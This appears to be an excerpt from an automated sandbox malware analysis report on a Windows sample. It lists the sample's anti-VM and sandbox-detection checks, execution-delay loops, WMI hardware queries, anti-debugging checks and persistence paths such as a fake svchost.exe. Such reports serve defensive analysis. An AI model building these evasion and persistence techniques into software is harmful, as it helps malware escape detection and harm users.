                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion:

                      barindex
                      Yara detected AntiVM3Show sources
                      Source: Yara matchFile source: 0.0.lKJbVguaav.exe.4297e30.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.lKJbVguaav.exe.4297e30.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.lKJbVguaav.exe.4217e10.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.lKJbVguaav.exe.4217e10.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.lKJbVguaav.exe.56f0000.13.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.lKJbVguaav.exe.41d7df0.9.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.lKJbVguaav.exe.56f0000.13.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.lKJbVguaav.exe.41b7dd0.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000000.424024151.00000000056F0000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.415536274.0000000004297000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.413677041.00000000041B7000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: lKJbVguaav.exe PID: 6396, type: MEMORYSTR
                      Tries to delay execution (extensive OutputDebugStringW loop)Show sources
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeSection loaded: OutputDebugStringW count: 1955
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exeSection loaded: OutputDebugStringW count: 3911
                      Source: C:\Program Files\Common Files\system\E59A6148\svchost.exeSection loaded: OutputDebugStringW count: 3911
                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
                      Source: lKJbVguaav.exe, 00000000.00000000.373585257.0000000003011000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
                      Source: lKJbVguaav.exe, 00000000.00000000.373585257.0000000003011000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
                      Source: lKJbVguaav.exe, 00000000.00000000.415536274.0000000004297000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL/WINE_GET_UNIX_FILE_NAMEQEMU
                      Source: lKJbVguaav.exe, 00000000.00000000.415536274.0000000004297000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLLUSER
                      Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)Show sources
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeWMI Queries: IWbemServices::ExecQuery - ROOT\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exeWMI Queries: IWbemServices::ExecQuery - ROOT\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exeWMI Queries: IWbemServices::ExecQuery - ROOT\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                      Source: C:\Program Files\Common Files\system\E59A6148\svchost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Program Files\Common Files\system\E59A6148\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                      Source: C:\Program Files\Common Files\system\E59A6148\svchost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Program Files\Common Files\system\E59A6148\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                      Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Windows\System32\svchost.exe TID: 6724Thread sleep time: -30000s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6576Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6208Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6252Thread sleep count: 2098 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4864Thread sleep time: -17524406870024063s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6240Thread sleep count: 41 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6596Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6468Thread sleep count: 874 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5044Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5340Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1260Thread sleep count: 1280 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 844Thread sleep time: -20291418481080494s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1236Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6636Thread sleep count: 1384 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3108Thread sleep time: -13835058055282155s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6000Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3980Thread sleep count: 849 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1284Thread sleep time: -11068046444225724s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5036Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4776Thread sleep count: 1653 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3676Thread sleep time: -11068046444225724s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4856Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4944Thread sleep count: 1214 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6516Thread sleep time: -13835058055282155s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5768Thread sleep count: 38 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6112Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\Desktop\lKJbVguaav.exe TID: 6152Thread sleep time: -18446744073709540s >= -30000s
                      Source: C:\Users\user\Desktop\lKJbVguaav.exe TID: 6220Thread sleep count: 3296 > 30
                      Source: C:\Users\user\Desktop\lKJbVguaav.exe TID: 6220Thread sleep count: 6484 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6384Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2892Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2092Thread sleep count: 1299 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6860Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5996Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4964Thread sleep count: 801 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4012Thread sleep time: -11068046444225724s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4012Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2904Thread sleep count: 457 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6976Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6976Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6668Thread sleep count: 342 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5176Thread sleep time: -11068046444225724s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5176Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6852Thread sleep count: 449 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4356Thread sleep time: -12912720851596678s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4356Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5768Thread sleep count: 322 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6008Thread sleep time: -1844674407370954s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3568Thread sleep count: 159 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1316Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4196Thread sleep count: 61 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6756Thread sleep count: 54 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6820Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2481Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2098
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 874
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1280
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1384
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 849
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1653
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1214
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeWindow / User API: threadDelayed 3296
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeWindow / User API: threadDelayed 6484
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1005
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1299
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 801
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 457
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 449
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                      Source: C:\Program Files\Common Files\system\E59A6148\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                      Source: C:\Program Files\Common Files\system\E59A6148\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                      Source: C:\Program Files\Common Files\system\E59A6148\svchost.exeFile opened / queried: C:\WINDOWS\SysWOW64\drivers\vmmouse.sys
                      Source: C:\Program Files\Common Files\system\E59A6148\svchost.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 name: Identifier
                      Source: C:\Program Files\Common Files\system\E59A6148\svchost.exeFile opened / queried: C:\WINDOWS\SysWOW64\drivers\vmhgfs.sys
                      Source: C:\Program Files\Common Files\system\E59A6148\svchost.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                      Source: C:\Program Files\Common Files\system\E59A6148\svchost.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                      Source: C:\Program Files\Common Files\system\E59A6148\svchost.exeFile opened / queried: C:\WINDOWS\SysWOW64\drivers\VBoxMouse.sys
                      Source: C:\Program Files\Common Files\system\E59A6148\svchost.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum name: 0
                      Source: C:\Program Files\Common Files\system\E59A6148\svchost.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeFile opened: C:\Users\user\AppData\Jump to behavior
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeFile opened: C:\Users\user\Jump to behavior
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Jump to behavior
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Jump to behavior
                      Source: lKJbVguaav.exe, 00000000.00000000.373585257.0000000003011000.00000004.00000001.sdmpBinary or memory string: VMware
                      Source: lKJbVguaav.exe, 00000000.00000000.415536274.0000000004297000.00000004.00000001.sdmpBinary or memory string: !noValueButYesKeySC:\WINDOWS\system32\drivers\VBoxMouse.sys
                      Source: lKJbVguaav.exe, 00000000.00000000.415536274.0000000004297000.00000004.00000001.sdmpBinary or memory string: VMWAREESOFTWARE\VMware, Inc.\VMware Tools
                      Source: lKJbVguaav.exe, 00000000.00000000.373585257.0000000003011000.00000004.00000001.sdmpBinary or memory string: vmware
                      Source: lKJbVguaav.exe, 00000000.00000000.415536274.0000000004297000.00000004.00000001.sdmpBinary or memory string: VMwareVBoxARun using valid operating system
                      Source: lKJbVguaav.exe, 00000000.00000000.373585257.0000000003011000.00000004.00000001.sdmpBinary or memory string: m%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                      Source: lKJbVguaav.exe, 00000000.00000000.373585257.0000000003011000.00000004.00000001.sdmpBinary or memory string: m&C:\WINDOWS\system32\drivers\vmhgfs.sys
                      Source: lKJbVguaav.exe, 00000000.00000000.373585257.0000000003011000.00000004.00000001.sdmpBinary or memory string: VMWARE
                      Source: lKJbVguaav.exe, 00000000.00000000.415536274.0000000004297000.00000004.00000001.sdmpBinary or memory string: kernel32.dll/wine_get_unix_file_nameQEMU
                      Source: lKJbVguaav.exe, 00000000.00000000.373585257.0000000003011000.00000004.00000001.sdmpBinary or memory string: m"SOFTWARE\VMware, Inc.\VMware Tools
                      Source: lKJbVguaav.exe, 00000000.00000000.373585257.0000000003011000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
                      Source: lKJbVguaav.exe, 00000000.00000000.415536274.0000000004297000.00000004.00000001.sdmpBinary or memory string: InstallPathKC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\OC:\WINDOWS\system32\drivers\vmmouse.sysMC:\WINDOWS\system32\drivers\vmhgfs.sys
                      Source: lKJbVguaav.exe, 00000000.00000000.373585257.0000000003011000.00000004.00000001.sdmpBinary or memory string: m)C:\WINDOWS\system32\drivers\VBoxMouse.sys
                      Source: lKJbVguaav.exe, 00000000.00000000.373585257.0000000003011000.00000004.00000001.sdmpBinary or memory string: m'C:\WINDOWS\system32\drivers\vmmouse.sys
                      Source: C:\Users\user\AppData\Local\Temp\74756a05-3a9e-4a94-ac38-fe701c90e011\AdvancedRun.exeProcess information queried: ProcessInformationJump to behavior

                      Anti Debugging:

                      barindex
                      Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))Show sources
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSystem information queried: CodeIntegrityInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSystem information queried: CodeIntegrityInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSystem information queried: CodeIntegrityInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSystem information queried: CodeIntegrityInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSystem information queried: CodeIntegrityInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSystem information queried: CodeIntegrityInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSystem information queried: CodeIntegrityInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSystem information queried: CodeIntegrityInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSystem information queried: CodeIntegrityInformation
                      Source: C:\Users\user\AppData\Local\Temp\74756a05-3a9e-4a94-ac38-fe701c90e011\AdvancedRun.exeCode function: 7_2_0040289F LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,7_2_0040289F
